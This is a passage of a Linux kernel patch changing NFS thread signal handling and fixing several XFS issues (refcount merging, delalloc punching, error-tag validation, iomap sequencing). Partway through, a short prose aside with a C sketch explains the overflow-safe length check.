+@@ -112,11 +109,7 @@ nfs41_callback_svc(void *vrqstp)
+ 	set_freezable();
+ 
+ 	while (!kthread_freezable_should_stop(NULL)) {
+-
+-		if (signal_pending(current))
+-			flush_signals(current);
+-
+-		prepare_to_wait(&serv->sv_cb_waitq, &wq, TASK_INTERRUPTIBLE);
++		prepare_to_wait(&serv->sv_cb_waitq, &wq, TASK_IDLE);
+ 		spin_lock_bh(&serv->sv_cb_lock);
+ 		if (!list_empty(&serv->sv_cb_list)) {
+ 			req = list_first_entry(&serv->sv_cb_list,
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index ba53cd89ec62c..b6d768bd5ccca 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1313,12 +1313,11 @@ static __be32 nfsd4_ssc_setup_dul(struct nfsd_net *nn, char *ipaddr,
+ 		/* found a match */
+ 		if (ni->nsui_busy) {
+ 			/*  wait - and try again */
+-			prepare_to_wait(&nn->nfsd_ssc_waitq, &wait,
+-				TASK_INTERRUPTIBLE);
++			prepare_to_wait(&nn->nfsd_ssc_waitq, &wait, TASK_IDLE);
+ 			spin_unlock(&nn->nfsd_ssc_lock);
+ 
+ 			/* allow 20secs for mount/unmount for now - revisit */
+-			if (signal_pending(current) ||
++			if (kthread_should_stop() ||
+ 					(schedule_timeout(20*HZ) == 0)) {
+ 				finish_wait(&nn->nfsd_ssc_waitq, &wait);
+ 				kfree(work);
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 0c75636054a54..a8190caf77f17 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -952,15 +952,6 @@ nfsd(void *vrqstp)
+ 
+ 	current->fs->umask = 0;
+ 
+-	/*
+-	 * thread is spawned with all signals set to SIG_IGN, re-enable
+-	 * the ones that will bring down the thread
+-	 */
+-	allow_signal(SIGKILL);
+-	allow_signal(SIGHUP);
+-	allow_signal(SIGINT);
+-	allow_signal(SIGQUIT);
+-
+ 	atomic_inc(&nfsdstats.th_cnt);
+ 
+ 	set_freezable();
+@@ -985,9 +976,6 @@ nfsd(void *vrqstp)
+ 		validate_process_creds();
+ 	}
+ 
+-	/* Clear signals before calling svc_exit_thread() */
+-	flush_signals(current);
+-
+ 	atomic_dec(&nfsdstats.th_cnt);
+ 
+ out:
+diff --git a/fs/xfs/libxfs/xfs_bmap.c b/fs/xfs/libxfs/xfs_bmap.c
+index 49d0d4ea63fcd..0d56a8d862e80 100644
+--- a/fs/xfs/libxfs/xfs_bmap.c
++++ b/fs/xfs/libxfs/xfs_bmap.c
+@@ -4058,7 +4058,7 @@ xfs_bmap_alloc_userdata(
+ 	 * the busy list.
+ 	 */
+ 	bma->datatype = XFS_ALLOC_NOBUSY;
+-	if (whichfork == XFS_DATA_FORK) {
++	if (whichfork == XFS_DATA_FORK || whichfork == XFS_COW_FORK) {
+ 		bma->datatype |= XFS_ALLOC_USERDATA;
+ 		if (bma->offset == 0)
+ 			bma->datatype |= XFS_ALLOC_INITIAL_USER_DATA;
+@@ -4551,7 +4551,8 @@ xfs_bmapi_convert_delalloc(
+ 	 * the extent.  Just return the real extent at this offset.
+ 	 */
+ 	if (!isnullstartblock(bma.got.br_startblock)) {
+-		xfs_bmbt_to_iomap(ip, iomap, &bma.got, 0, flags);
++		xfs_bmbt_to_iomap(ip, iomap, &bma.got, 0, flags,
++				xfs_iomap_inode_sequence(ip, flags));
+ 		*seq = READ_ONCE(ifp->if_seq);
+ 		goto out_trans_cancel;
+ 	}
+@@ -4599,7 +4600,8 @@ xfs_bmapi_convert_delalloc(
+ 	XFS_STATS_INC(mp, xs_xstrat_quick);
+ 
+ 	ASSERT(!isnullstartblock(bma.got.br_startblock));
+-	xfs_bmbt_to_iomap(ip, iomap, &bma.got, 0, flags);
++	xfs_bmbt_to_iomap(ip, iomap, &bma.got, 0, flags,
++				xfs_iomap_inode_sequence(ip, flags));
+ 	*seq = READ_ONCE(ifp->if_seq);
+ 
+ 	if (whichfork == XFS_COW_FORK)
+diff --git a/fs/xfs/libxfs/xfs_errortag.h b/fs/xfs/libxfs/xfs_errortag.h
+index 5362908164b0b..580ccbd5aadc2 100644
+--- a/fs/xfs/libxfs/xfs_errortag.h
++++ b/fs/xfs/libxfs/xfs_errortag.h
+@@ -40,13 +40,12 @@
+ #define XFS_ERRTAG_REFCOUNT_FINISH_ONE			25
+ #define XFS_ERRTAG_BMAP_FINISH_ONE			26
+ #define XFS_ERRTAG_AG_RESV_CRITICAL			27
++
+ /*
+- * DEBUG mode instrumentation to test and/or trigger delayed allocation
+- * block killing in the event of failed writes. When enabled, all
+- * buffered writes are silenty dropped and handled as if they failed.
+- * All delalloc blocks in the range of the write (including pre-existing
+- * delalloc blocks!) are tossed as part of the write failure error
+- * handling sequence.
++ * Drop-writes support removed because write error handling cannot trash
++ * pre-existing delalloc extents in any useful way anymore. We retain the
++ * definition so that we can reject it as an invalid value in
++ * xfs_errortag_valid().
+  */
+ #define XFS_ERRTAG_DROP_WRITES				28
+ #define XFS_ERRTAG_LOG_BAD_CRC				29
+@@ -95,7 +94,6 @@
+ #define XFS_RANDOM_REFCOUNT_FINISH_ONE			1
+ #define XFS_RANDOM_BMAP_FINISH_ONE			1
+ #define XFS_RANDOM_AG_RESV_CRITICAL			4
+-#define XFS_RANDOM_DROP_WRITES				1
+ #define XFS_RANDOM_LOG_BAD_CRC				1
+ #define XFS_RANDOM_LOG_ITEM_PIN				1
+ #define XFS_RANDOM_BUF_LRU_REF				2
+diff --git a/fs/xfs/libxfs/xfs_refcount.c b/fs/xfs/libxfs/xfs_refcount.c
+index 3f34bafe18dd1..6f7ed9288fe40 100644
+--- a/fs/xfs/libxfs/xfs_refcount.c
++++ b/fs/xfs/libxfs/xfs_refcount.c
+@@ -815,11 +815,136 @@ xfs_refcount_find_right_extents(
+ /* Is this extent valid? */
+ static inline bool
+ xfs_refc_valid(
+-	struct xfs_refcount_irec	*rc)
++	const struct xfs_refcount_irec	*rc)
+ {
+ 	return rc->rc_startblock != NULLAGBLOCK;
+ }
+ 
++static inline xfs_nlink_t
++xfs_refc_merge_refcount(
++	const struct xfs_refcount_irec	*irec,
++	enum xfs_refc_adjust_op		adjust)
++{
++	/* Once a record hits MAXREFCOUNT, it is pinned there forever */
++	if (irec->rc_refcount == MAXREFCOUNT)
++		return MAXREFCOUNT;
++	return irec->rc_refcount + adjust;
++}
++
++static inline bool
++xfs_refc_want_merge_center(
++	const struct xfs_refcount_irec	*left,
++	const struct xfs_refcount_irec	*cleft,
++	const struct xfs_refcount_irec	*cright,
++	const struct xfs_refcount_irec	*right,
++	bool				cleft_is_cright,
++	enum xfs_refc_adjust_op		adjust,
++	unsigned long long		*ulenp)
++{
++	unsigned long long		ulen = left->rc_blockcount;
++	xfs_nlink_t			new_refcount;
++
++	/*
++	 * To merge with a center record, both shoulder records must be
++	 * adjacent to the record we want to adjust.  This is only true if
++	 * find_left and find_right made all four records valid.
++	 */
++	if (!xfs_refc_valid(left)  || !xfs_refc_valid(right) ||
++	    !xfs_refc_valid(cleft) || !xfs_refc_valid(cright))
++		return false;
++
++	/* There must only be one record for the entire range. */
++	if (!cleft_is_cright)
++		return false;
++
++	/* The shoulder record refcounts must match the new refcount. */
++	new_refcount = xfs_refc_merge_refcount(cleft, adjust);
++	if (left->rc_refcount != new_refcount)
++		return false;
++	if (right->rc_refcount != new_refcount)
++		return false;
++
++	/*
++	 * The new record cannot exceed the max length.  ulen is a ULL as the
++	 * individual record block counts can be up to (u32 - 1) in length
++	 * hence we need to catch u32 addition overflows here.
++	 */
++	ulen += cleft->rc_blockcount + right->rc_blockcount;
++	if (ulen >= MAXREFCEXTLEN)
++		return false;
++
++	*ulenp = ulen;
++	return true;
++}
++
++static inline bool
++xfs_refc_want_merge_left(
++	const struct xfs_refcount_irec	*left,
++	const struct xfs_refcount_irec	*cleft,
++	enum xfs_refc_adjust_op		adjust)
++{
++	unsigned long long		ulen = left->rc_blockcount;
++	xfs_nlink_t			new_refcount;
++
++	/*
++	 * For a left merge, the left shoulder record must be adjacent to the
++	 * start of the range.  If this is true, find_left made left and cleft
++	 * contain valid contents.
++	 */
++	if (!xfs_refc_valid(left) || !xfs_refc_valid(cleft))
++		return false;
++
++	/* Left shoulder record refcount must match the new refcount. */
++	new_refcount = xfs_refc_merge_refcount(cleft, adjust);
++	if (left->rc_refcount != new_refcount)
++		return false;
++
++	/*
++	 * The new record cannot exceed the max length.  ulen is a ULL as the
++	 * individual record block counts can be up to (u32 - 1) in length
++	 * hence we need to catch u32 addition overflows here.
++	 */
++	ulen += cleft->rc_blockcount;
++	if (ulen >= MAXREFCEXTLEN)
++		return false;
++
++	return true;
++}
++
++static inline bool
++xfs_refc_want_merge_right(
++	const struct xfs_refcount_irec	*cright,
++	const struct xfs_refcount_irec	*right,
++	enum xfs_refc_adjust_op		adjust)
++{
++	unsigned long long		ulen = right->rc_blockcount;
++	xfs_nlink_t			new_refcount;
++
++	/*
++	 * For a right merge, the right shoulder record must be adjacent to the
++	 * end of the range.  If this is true, find_right made cright and right
++	 * contain valid contents.
++	 */
++	if (!xfs_refc_valid(right) || !xfs_refc_valid(cright))
++		return false;
++
++	/* Right shoulder record refcount must match the new refcount. */
++	new_refcount = xfs_refc_merge_refcount(cright, adjust);
++	if (right->rc_refcount != new_refcount)
++		return false;
++
++	/*
++	 * The new record cannot exceed the max length.  ulen is a ULL as the
++	 * individual record block counts can be up to (u32 - 1) in length
++	 * hence we need to catch u32 addition overflows here.
++	 */
++	ulen += cright->rc_blockcount;
++	if (ulen >= MAXREFCEXTLEN)
++		return false;
++
++	return true;
++}
++
+ /*
+  * Try to merge with any extents on the boundaries of the adjustment range.
+  */
+@@ -861,23 +986,15 @@ xfs_refcount_merge_extents(
+ 		 (cleft.rc_blockcount == cright.rc_blockcount);
+ 
+ 	/* Try to merge left, cleft, and right.  cleft must == cright. */
+-	ulen = (unsigned long long)left.rc_blockcount + cleft.rc_blockcount +
+-			right.rc_blockcount;
+-	if (xfs_refc_valid(&left) && xfs_refc_valid(&right) &&
+-	    xfs_refc_valid(&cleft) && xfs_refc_valid(&cright) && cequal &&
+-	    left.rc_refcount == cleft.rc_refcount + adjust &&
+-	    right.rc_refcount == cleft.rc_refcount + adjust &&
+-	    ulen < MAXREFCEXTLEN) {
++	if (xfs_refc_want_merge_center(&left, &cleft, &cright, &right, cequal,
++				adjust, &ulen)) {
+ 		*shape_changed = true;
+ 		return xfs_refcount_merge_center_extents(cur, &left, &cleft,
+ 				&right, ulen, aglen);
+ 	}
+ 
+ 	/* Try to merge left and cleft. */
+-	ulen = (unsigned long long)left.rc_blockcount + cleft.rc_blockcount;
+-	if (xfs_refc_valid(&left) && xfs_refc_valid(&cleft) &&
+-	    left.rc_refcount == cleft.rc_refcount + adjust &&
+-	    ulen < MAXREFCEXTLEN) {
++	if (xfs_refc_want_merge_left(&left, &cleft, adjust)) {
+ 		*shape_changed = true;
+ 		error = xfs_refcount_merge_left_extent(cur, &left, &cleft,
+ 				agbno, aglen);
+@@ -893,10 +1010,7 @@ xfs_refcount_merge_extents(
+ 	}
+ 
+ 	/* Try to merge cright and right. */
+-	ulen = (unsigned long long)right.rc_blockcount + cright.rc_blockcount;
+-	if (xfs_refc_valid(&right) && xfs_refc_valid(&cright) &&
+-	    right.rc_refcount == cright.rc_refcount + adjust &&
+-	    ulen < MAXREFCEXTLEN) {
++	if (xfs_refc_want_merge_right(&cright, &right, adjust)) {
+ 		*shape_changed = true;
+ 		return xfs_refcount_merge_right_extent(cur, &right, &cright,
+ 				aglen);
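
The refcount hunks above factor the three merge conditions into want_merge_{center,left,right} predicates; each widens the block-count sum to unsigned long long before comparing against the maximum extent length, since two u32 counts can overflow 32 bits. A standalone sketch of the widening overflow guard (the cap is a hypothetical stand-in for MAXREFCEXTLEN):

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_EXT_LEN	((1ULL << 32) - 1)	/* hypothetical cap */

/* Widen before adding: two u32 counts can exceed UINT32_MAX. */
static bool can_merge(uint32_t left_len, uint32_t right_len)
{
	unsigned long long ulen = left_len;

	ulen += right_len;
	return ulen < MAX_EXT_LEN;
}

int main(void)
{
	printf("%d\n", can_merge(100, 200));			/* 1 */
	printf("%d\n", can_merge(0xFFFFFFFF, 0xFFFFFFFF));	/* 0 */
	return 0;
}
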
+diff --git a/fs/xfs/libxfs/xfs_sb.c b/fs/xfs/libxfs/xfs_sb.c
+index b6a584e044be0..bf2cca78304eb 100644
+--- a/fs/xfs/libxfs/xfs_sb.c
++++ b/fs/xfs/libxfs/xfs_sb.c
+@@ -266,7 +266,8 @@ xfs_validate_sb_write(
+ 		return -EFSCORRUPTED;
+ 	}
+ 
+-	if (xfs_sb_has_ro_compat_feature(sbp, XFS_SB_FEAT_RO_COMPAT_UNKNOWN)) {
++	if (!xfs_is_readonly(mp) &&
++	    xfs_sb_has_ro_compat_feature(sbp, XFS_SB_FEAT_RO_COMPAT_UNKNOWN)) {
+ 		xfs_alert(mp,
+ "Corruption detected in superblock read-only compatible features (0x%x)!",
+ 			(sbp->sb_features_ro_compat &
+@@ -973,7 +974,9 @@ xfs_log_sb(
+ 	 */
+ 	if (xfs_has_lazysbcount(mp)) {
+ 		mp->m_sb.sb_icount = percpu_counter_sum(&mp->m_icount);
+-		mp->m_sb.sb_ifree = percpu_counter_sum(&mp->m_ifree);
++		mp->m_sb.sb_ifree = min_t(uint64_t,
++				percpu_counter_sum(&mp->m_ifree),
++				mp->m_sb.sb_icount);
+ 		mp->m_sb.sb_fdblocks = percpu_counter_sum(&mp->m_fdblocks);
+ 	}
+ 
+diff --git a/fs/xfs/xfs_aops.c b/fs/xfs/xfs_aops.c
+index 5d1a995b15f83..21c241e96d483 100644
+--- a/fs/xfs/xfs_aops.c
++++ b/fs/xfs/xfs_aops.c
+@@ -114,9 +114,8 @@ xfs_end_ioend(
+ 	if (unlikely(error)) {
+ 		if (ioend->io_flags & IOMAP_F_SHARED) {
+ 			xfs_reflink_cancel_cow_range(ip, offset, size, true);
+-			xfs_bmap_punch_delalloc_range(ip,
+-						      XFS_B_TO_FSBT(mp, offset),
+-						      XFS_B_TO_FSB(mp, size));
++			xfs_bmap_punch_delalloc_range(ip, offset,
++					offset + size);
+ 		}
+ 		goto done;
+ 	}
+@@ -373,7 +372,7 @@ xfs_map_blocks(
+ 	    isnullstartblock(imap.br_startblock))
+ 		goto allocate_blocks;
+ 
+-	xfs_bmbt_to_iomap(ip, &wpc->iomap, &imap, 0, 0);
++	xfs_bmbt_to_iomap(ip, &wpc->iomap, &imap, 0, 0, XFS_WPC(wpc)->data_seq);
+ 	trace_xfs_map_blocks_found(ip, offset, count, whichfork, &imap);
+ 	return 0;
+ allocate_blocks:
+@@ -440,27 +439,25 @@ xfs_prepare_ioend(
+ }
+ 
+ /*
+- * If the page has delalloc blocks on it, we need to punch them out before we
+- * invalidate the page.  If we don't, we leave a stale delalloc mapping on the
+- * inode that can trip up a later direct I/O read operation on the same region.
++ * If the folio has delalloc blocks on it, the caller is asking us to punch them
++ * out. If we don't, we can leave a stale delalloc mapping covered by a clean
++ * page that needs to be dirtied again before the delalloc mapping can be
++ * converted. This stale delalloc mapping can trip up a later direct I/O read
++ * operation on the same region.
+  *
+- * We prevent this by truncating away the delalloc regions on the page.  Because
++ * We prevent this by truncating away the delalloc regions on the folio. Because
+  * they are delalloc, we can do this without needing a transaction. Indeed - if
+  * we get ENOSPC errors, we have to be able to do this truncation without a
+- * transaction as there is no space left for block reservation (typically why we
+- * see a ENOSPC in writeback).
++ * transaction as there is no space left for block reservation (typically why
++ * we see an ENOSPC in writeback).
+  */
+ static void
+ xfs_discard_folio(
+ 	struct folio		*folio,
+ 	loff_t			pos)
+ {
+-	struct inode		*inode = folio->mapping->host;
+-	struct xfs_inode	*ip = XFS_I(inode);
++	struct xfs_inode	*ip = XFS_I(folio->mapping->host);
+ 	struct xfs_mount	*mp = ip->i_mount;
+-	size_t			offset = offset_in_folio(folio, pos);
+-	xfs_fileoff_t		start_fsb = XFS_B_TO_FSBT(mp, pos);
+-	xfs_fileoff_t		pageoff_fsb = XFS_B_TO_FSBT(mp, offset);
+ 	int			error;
+ 
+ 	if (xfs_is_shutdown(mp))
+@@ -470,8 +467,14 @@ xfs_discard_folio(
+ 		"page discard on page "PTR_FMT", inode 0x%llx, pos %llu.",
+ 			folio, ip->i_ino, pos);
+ 
+-	error = xfs_bmap_punch_delalloc_range(ip, start_fsb,
+-			i_blocks_per_folio(inode, folio) - pageoff_fsb);
++	/*
++	 * The end of the punch range is always the offset of the first
++	 * byte of the next folio. Hence the end offset is only dependent on the
++	 * folio itself and not the start offset that is passed in.
++	 */
++	error = xfs_bmap_punch_delalloc_range(ip, pos,
++				folio_pos(folio) + folio_size(folio));
++
+ 	if (error && !xfs_is_shutdown(mp))
+ 		xfs_alert(mp, "page discard unable to remove delalloc mapping.");
+ }
+diff --git a/fs/xfs/xfs_bmap_util.c b/fs/xfs/xfs_bmap_util.c
+index 04d0c2bff67c4..867645b74d889 100644
+--- a/fs/xfs/xfs_bmap_util.c
++++ b/fs/xfs/xfs_bmap_util.c
+@@ -590,11 +590,13 @@ xfs_getbmap(
+ int
+ xfs_bmap_punch_delalloc_range(
+ 	struct xfs_inode	*ip,
+-	xfs_fileoff_t		start_fsb,
+-	xfs_fileoff_t		length)
++	xfs_off_t		start_byte,
++	xfs_off_t		end_byte)
+ {
++	struct xfs_mount	*mp = ip->i_mount;
+ 	struct xfs_ifork	*ifp = &ip->i_df;
+-	xfs_fileoff_t		end_fsb = start_fsb + length;
++	xfs_fileoff_t		start_fsb = XFS_B_TO_FSBT(mp, start_byte);
++	xfs_fileoff_t		end_fsb = XFS_B_TO_FSB(mp, end_byte);
+ 	struct xfs_bmbt_irec	got, del;
+ 	struct xfs_iext_cursor	icur;
+ 	int			error = 0;
+@@ -607,7 +609,7 @@ xfs_bmap_punch_delalloc_range(
+ 
+ 	while (got.br_startoff + got.br_blockcount > start_fsb) {
+ 		del = got;
+-		xfs_trim_extent(&del, start_fsb, length);
++		xfs_trim_extent(&del, start_fsb, end_fsb - start_fsb);
+ 
+ 		/*
+ 		 * A delete can push the cursor forward. Step back to the
+diff --git a/fs/xfs/xfs_bmap_util.h b/fs/xfs/xfs_bmap_util.h
+index 24b37d211f1dc..6888078f5c31e 100644
+--- a/fs/xfs/xfs_bmap_util.h
++++ b/fs/xfs/xfs_bmap_util.h
+@@ -31,7 +31,7 @@ xfs_bmap_rtalloc(struct xfs_bmalloca *ap)
+ #endif /* CONFIG_XFS_RT */
+ 
+ int	xfs_bmap_punch_delalloc_range(struct xfs_inode *ip,
+-		xfs_fileoff_t start_fsb, xfs_fileoff_t length);
++		xfs_off_t start_byte, xfs_off_t end_byte);
+ 
+ struct kgetbmap {
+ 	__s64		bmv_offset;	/* file offset of segment in blocks */
+diff --git a/fs/xfs/xfs_buf.c b/fs/xfs/xfs_buf.c
+index dde346450952a..54c774af6e1c6 100644
+--- a/fs/xfs/xfs_buf.c
++++ b/fs/xfs/xfs_buf.c
+@@ -1945,6 +1945,7 @@ xfs_free_buftarg(
+ 	list_lru_destroy(&btp->bt_lru);
+ 
+ 	blkdev_issue_flush(btp->bt_bdev);
++	invalidate_bdev(btp->bt_bdev);
+ 	fs_put_dax(btp->bt_daxdev, btp->bt_mount);
+ 
+ 	kmem_free(btp);
+diff --git a/fs/xfs/xfs_buf_item.c b/fs/xfs/xfs_buf_item.c
+index 522d450a94b18..df7322ed73fa9 100644
+--- a/fs/xfs/xfs_buf_item.c
++++ b/fs/xfs/xfs_buf_item.c
+@@ -1018,6 +1018,8 @@ xfs_buf_item_relse(
+ 	trace_xfs_buf_item_relse(bp, _RET_IP_);
+ 	ASSERT(!test_bit(XFS_LI_IN_AIL, &bip->bli_item.li_flags));
+ 
++	if (atomic_read(&bip->bli_refcount))
++		return;
+ 	bp->b_log_item = NULL;
+ 	xfs_buf_rele(bp);
+ 	xfs_buf_item_free(bip);
+diff --git a/fs/xfs/xfs_error.c b/fs/xfs/xfs_error.c
+index c6b2aabd6f187..dea3c0649d2f7 100644
+--- a/fs/xfs/xfs_error.c
++++ b/fs/xfs/xfs_error.c
+@@ -46,7 +46,7 @@ static unsigned int xfs_errortag_random_default[] = {
+ 	XFS_RANDOM_REFCOUNT_FINISH_ONE,
+ 	XFS_RANDOM_BMAP_FINISH_ONE,
+ 	XFS_RANDOM_AG_RESV_CRITICAL,
+-	XFS_RANDOM_DROP_WRITES,
++	0, /* XFS_RANDOM_DROP_WRITES has been removed */
+ 	XFS_RANDOM_LOG_BAD_CRC,
+ 	XFS_RANDOM_LOG_ITEM_PIN,
+ 	XFS_RANDOM_BUF_LRU_REF,
+@@ -162,7 +162,6 @@ XFS_ERRORTAG_ATTR_RW(refcount_continue_update,	XFS_ERRTAG_REFCOUNT_CONTINUE_UPDA
+ XFS_ERRORTAG_ATTR_RW(refcount_finish_one,	XFS_ERRTAG_REFCOUNT_FINISH_ONE);
+ XFS_ERRORTAG_ATTR_RW(bmap_finish_one,	XFS_ERRTAG_BMAP_FINISH_ONE);
+ XFS_ERRORTAG_ATTR_RW(ag_resv_critical,	XFS_ERRTAG_AG_RESV_CRITICAL);
+-XFS_ERRORTAG_ATTR_RW(drop_writes,	XFS_ERRTAG_DROP_WRITES);
+ XFS_ERRORTAG_ATTR_RW(log_bad_crc,	XFS_ERRTAG_LOG_BAD_CRC);
+ XFS_ERRORTAG_ATTR_RW(log_item_pin,	XFS_ERRTAG_LOG_ITEM_PIN);
+ XFS_ERRORTAG_ATTR_RW(buf_lru_ref,	XFS_ERRTAG_BUF_LRU_REF);
+@@ -206,7 +205,6 @@ static struct attribute *xfs_errortag_attrs[] = {
+ 	XFS_ERRORTAG_ATTR_LIST(refcount_finish_one),
+ 	XFS_ERRORTAG_ATTR_LIST(bmap_finish_one),
+ 	XFS_ERRORTAG_ATTR_LIST(ag_resv_critical),
+-	XFS_ERRORTAG_ATTR_LIST(drop_writes),
+ 	XFS_ERRORTAG_ATTR_LIST(log_bad_crc),
+ 	XFS_ERRORTAG_ATTR_LIST(log_item_pin),
+ 	XFS_ERRORTAG_ATTR_LIST(buf_lru_ref),
+@@ -256,6 +254,19 @@ xfs_errortag_del(
+ 	kmem_free(mp->m_errortag);
+ }
+ 
++static bool
++xfs_errortag_valid(
++	unsigned int		error_tag)
++{
++	if (error_tag >= XFS_ERRTAG_MAX)
++		return false;
++
++	/* Error out removed injection types */
++	if (error_tag == XFS_ERRTAG_DROP_WRITES)
++		return false;
++	return true;
++}
++
+ bool
+ xfs_errortag_test(
+ 	struct xfs_mount	*mp,
+@@ -277,7 +288,9 @@ xfs_errortag_test(
+ 	if (!mp->m_errortag)
+ 		return false;
+ 
+-	ASSERT(error_tag < XFS_ERRTAG_MAX);
++	if (!xfs_errortag_valid(error_tag))
++		return false;
++
+ 	randfactor = mp->m_errortag[error_tag];
+ 	if (!randfactor || prandom_u32_max(randfactor))
+ 		return false;
+@@ -293,7 +306,7 @@ xfs_errortag_get(
+ 	struct xfs_mount	*mp,
+ 	unsigned int		error_tag)
+ {
+-	if (error_tag >= XFS_ERRTAG_MAX)
++	if (!xfs_errortag_valid(error_tag))
+ 		return -EINVAL;
+ 
+ 	return mp->m_errortag[error_tag];
+@@ -305,7 +318,7 @@ xfs_errortag_set(
+ 	unsigned int		error_tag,
+ 	unsigned int		tag_value)
+ {
+-	if (error_tag >= XFS_ERRTAG_MAX)
++	if (!xfs_errortag_valid(error_tag))
+ 		return -EINVAL;
+ 
+ 	mp->m_errortag[error_tag] = tag_value;
+@@ -319,7 +332,7 @@ xfs_errortag_add(
+ {
+ 	BUILD_BUG_ON(ARRAY_SIZE(xfs_errortag_random_default) != XFS_ERRTAG_MAX);
+ 
+-	if (error_tag >= XFS_ERRTAG_MAX)
++	if (!xfs_errortag_valid(error_tag))
+ 		return -EINVAL;
+ 
+ 	return xfs_errortag_set(mp, error_tag,
+diff --git a/fs/xfs/xfs_file.c b/fs/xfs/xfs_file.c
+index e462d39c840e6..595a5bcf46b94 100644
+--- a/fs/xfs/xfs_file.c
++++ b/fs/xfs/xfs_file.c
+@@ -1325,7 +1325,7 @@ __xfs_filemap_fault(
+ 		if (write_fault) {
+ 			xfs_ilock(XFS_I(inode), XFS_MMAPLOCK_SHARED);
+ 			ret = iomap_page_mkwrite(vmf,
+-					&xfs_buffered_write_iomap_ops);
++					&xfs_page_mkwrite_iomap_ops);
+ 			xfs_iunlock(XFS_I(inode), XFS_MMAPLOCK_SHARED);
+ 		} else {
+ 			ret = filemap_fault(vmf);
+diff --git a/fs/xfs/xfs_fsops.c b/fs/xfs/xfs_fsops.c
+index 13851c0d640bc..332da0d7b85cf 100644
+--- a/fs/xfs/xfs_fsops.c
++++ b/fs/xfs/xfs_fsops.c
+@@ -129,6 +129,10 @@ xfs_growfs_data_private(
+ 	if (delta < 0 && nagcount < 2)
+ 		return -EINVAL;
+ 
++	/* No work to do */
++	if (delta == 0)
++		return 0;
++
+ 	oagcount = mp->m_sb.sb_agcount;
+ 	/* allocate the new per-ag structures */
+ 	if (nagcount > oagcount) {
+diff --git a/fs/xfs/xfs_icache.c b/fs/xfs/xfs_icache.c
+index d884cba1d7072..dd5a664c294f5 100644
+--- a/fs/xfs/xfs_icache.c
++++ b/fs/xfs/xfs_icache.c
+@@ -342,6 +342,9 @@ xfs_iget_recycle(
+ 
+ 	trace_xfs_iget_recycle(ip);
+ 
++	if (!xfs_ilock_nowait(ip, XFS_ILOCK_EXCL))
++		return -EAGAIN;
++
+ 	/*
+ 	 * We need to make it look like the inode is being reclaimed to prevent
+ 	 * the actual reclaim workers from stomping over us while we recycle
+@@ -355,6 +358,7 @@ xfs_iget_recycle(
+ 
+ 	ASSERT(!rwsem_is_locked(&inode->i_rwsem));
+ 	error = xfs_reinit_inode(mp, inode);
++	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 	if (error) {
+ 		/*
+ 		 * Re-initializing the inode failed, and we are in deep
+@@ -523,6 +527,8 @@ xfs_iget_cache_hit(
+ 	if (ip->i_flags & XFS_IRECLAIMABLE) {
+ 		/* Drops i_flags_lock and RCU read lock. */
+ 		error = xfs_iget_recycle(pag, ip);
++		if (error == -EAGAIN)
++			goto out_skip;
+ 		if (error)
+ 			return error;
+ 	} else {
+diff --git a/fs/xfs/xfs_inode.c b/fs/xfs/xfs_inode.c
+index aa303be11576f..54b707787f907 100644
+--- a/fs/xfs/xfs_inode.c
++++ b/fs/xfs/xfs_inode.c
+@@ -1652,8 +1652,11 @@ xfs_inode_needs_inactive(
+ 	if (VFS_I(ip)->i_mode == 0)
+ 		return false;
+ 
+-	/* If this is a read-only mount, don't do this (would generate I/O) */
+-	if (xfs_is_readonly(mp))
++	/*
++	 * If this is a read-only mount, don't do this (would generate I/O)
++	 * unless we're in log recovery and cleaning the iunlinked list.
++	 */
++	if (xfs_is_readonly(mp) && !xlog_recovery_needed(mp->m_log))
+ 		return false;
+ 
+ 	/* If the log isn't running, push inodes straight to reclaim. */
+@@ -1713,8 +1716,11 @@ xfs_inactive(
+ 	mp = ip->i_mount;
+ 	ASSERT(!xfs_iflags_test(ip, XFS_IRECOVERY));
+ 
+-	/* If this is a read-only mount, don't do this (would generate I/O) */
+-	if (xfs_is_readonly(mp))
++	/*
++	 * If this is a read-only mount, don't do this (would generate I/O)
++	 * unless we're in log recovery and cleaning the iunlinked list.
++	 */
++	if (xfs_is_readonly(mp) && !xlog_recovery_needed(mp->m_log))
+ 		goto out;
+ 
+ 	/* Metadata inodes require explicit resource cleanup. */
+@@ -2479,7 +2485,7 @@ xfs_remove(
+ 			error = xfs_dir_replace(tp, ip, &xfs_name_dotdot,
+ 					tp->t_mountp->m_sb.sb_rootino, 0);
+ 			if (error)
+-				return error;
++				goto out_trans_cancel;
+ 		}
+ 	} else {
+ 		/*
+diff --git a/fs/xfs/xfs_ioctl.c b/fs/xfs/xfs_ioctl.c
+index 1f783e9796296..85fbb3b71d1c6 100644
+--- a/fs/xfs/xfs_ioctl.c
++++ b/fs/xfs/xfs_ioctl.c
+@@ -754,7 +754,7 @@ xfs_bulkstat_fmt(
+ static int
+ xfs_bulk_ireq_setup(
+ 	struct xfs_mount	*mp,
+-	struct xfs_bulk_ireq	*hdr,
++	const struct xfs_bulk_ireq *hdr,
+ 	struct xfs_ibulk	*breq,
+ 	void __user		*ubuffer)
+ {
+@@ -780,7 +780,7 @@ xfs_bulk_ireq_setup(
+ 
+ 		switch (hdr->ino) {
+ 		case XFS_BULK_IREQ_SPECIAL_ROOT:
+-			hdr->ino = mp->m_sb.sb_rootino;
++			breq->startino = mp->m_sb.sb_rootino;
+ 			break;
+ 		default:
+ 			return -EINVAL;
+diff --git a/fs/xfs/xfs_iomap.c b/fs/xfs/xfs_iomap.c
+index 07da03976ec12..ab5512c0bcf7a 100644
+--- a/fs/xfs/xfs_iomap.c
++++ b/fs/xfs/xfs_iomap.c
+@@ -48,13 +48,45 @@ xfs_alert_fsblock_zero(
+ 	return -EFSCORRUPTED;
+ }
+ 
++u64
++xfs_iomap_inode_sequence(
++	struct xfs_inode	*ip,
++	u16			iomap_flags)
++{
++	u64			cookie = 0;
++
++	if (iomap_flags & IOMAP_F_XATTR)
++		return READ_ONCE(ip->i_af.if_seq);
++	if ((iomap_flags & IOMAP_F_SHARED) && ip->i_cowfp)
++		cookie = (u64)READ_ONCE(ip->i_cowfp->if_seq) << 32;
++	return cookie | READ_ONCE(ip->i_df.if_seq);
++}
++
++/*
++ * Check that the iomap passed to us is still valid for the given offset and
++ * length.
++ */
